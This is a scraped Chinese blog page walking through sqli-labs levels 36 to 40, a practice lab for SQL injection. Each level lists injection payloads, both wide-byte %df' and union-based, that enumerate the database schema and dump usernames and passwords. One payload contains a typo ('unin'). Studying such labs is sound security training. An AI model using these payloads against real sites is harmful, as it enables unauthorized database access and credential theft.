当前位置: 首页 > news >正文

sqli-labs靶场通关攻略(36-40关)

news 2025/8/22 5:28:44

第36关(宽字节注入(Bypass MySQL Real Escape String)

查数据库

?id=-1%df%27%20union%20select%202,database(),3%20--+

 

查表

?id=-1%df' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database() --+

查列

?id=-1%df' union select 1,group_concat(column_name),3 from information_schema.columns where table_schema=database() and table_name=0x7573657273 --+

查数据

?id=-1%df' union select 1,group_concat(username,password),3 from users --+

第37关(post宽字节注入(MySQL_real_escape_string) )

我们这关要用到抓包工具进行抓包,因为这关是post注入嘛

登录的时候进行抓包

查库

%df' union select 1,database() --+

查表

%df' union select 1,group_concat(table_name)from information_schema.tables where table_schema=database() --+

查列

%df' union select 1,group_concat(column_name)from information_schema.columns where table_schema=database() and table_name=0x7573657273

查数据

%df' union select 1,group_concat(username,password)from users--+

第38关(联合查询/也可堆叠注入)

查库

?id=-1' union select 1,database(),3 --+

查表

?id=-1' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database() --+

查列

?id=-1' union select 1,group_concat(column_name),3 from information_schema.columns where table_schema= database() and table_name=0x7573657273 --+

查数据

?id=-1' union select 1,group_concat(username,password),3 from users --+

第39关(联合查询)

查数据库

?id=-1 unin select 1,database(),3 --+

查表

?id=-1 union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database() --+

查列

?id=-1 union select 1,group_concat(column_name),3 from information_schema.columns where table_schema=database() and table_name=0x7573657273

查数据

?id=-1 union select 1,group_concat(username,password),3 from users --+

 

第40关( ') 闭合)

查数据库

?id=-1') union select 1,database(),3 --+

查表

?id=-1') union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database() --+

查列

?id=-1') union select 1,group_concat(column_name),3 from information_schema.columns where table_schema=database() and table_name=0x7573657273 --+

查数据

?id=-1') union select 1,group_concat(username,password),3 from users --+


http://www.mrgr.cn/news/12107.html

相关文章:

  • 命题的相关知识
  • matplotlib保存指定图像大小
  • uni-app开发日志:schema2code生成的新增页和修改页因字段太多用分段器实现分段分类
  • VS环境中使用QT、OpenCV进行简易图像处理(附源码)
  • DBSCAN算法详解
  • Vulkan入门系列18 - 计算着色器(Compute Shader)
  • Linux(CentOS8)系统安装mysql-8.0.26-linux-glibc2.12-x86_64.tar.xz
  • fastapi知识点及应用
  • pyautogui的一些自动化示例,附代码
  • 计算机毕业设计选题推荐-OA办公管理系统-Java/Python项目实战
  • 金融涉案账户压降行动的实施成效与挑战
  • jenkins发送html邮件配置步骤与注意事项?
  • 认知杂谈25
  • SpringBoot -在Axis2中,RPCServiceClient调用WebService
  • Android PopupWindow弹窗动态显示在View的上下方,
  • 8月27日cs61c
  • Redis6.0新特性
  • 在我的博士科研生活中,SCI的英语写作一直是我的挑战。
  • Vue3+Ts封装input组件时遇到的问题
  • 【iOS端】基于Uniapp跨平台接入即构RTC+相芯美颜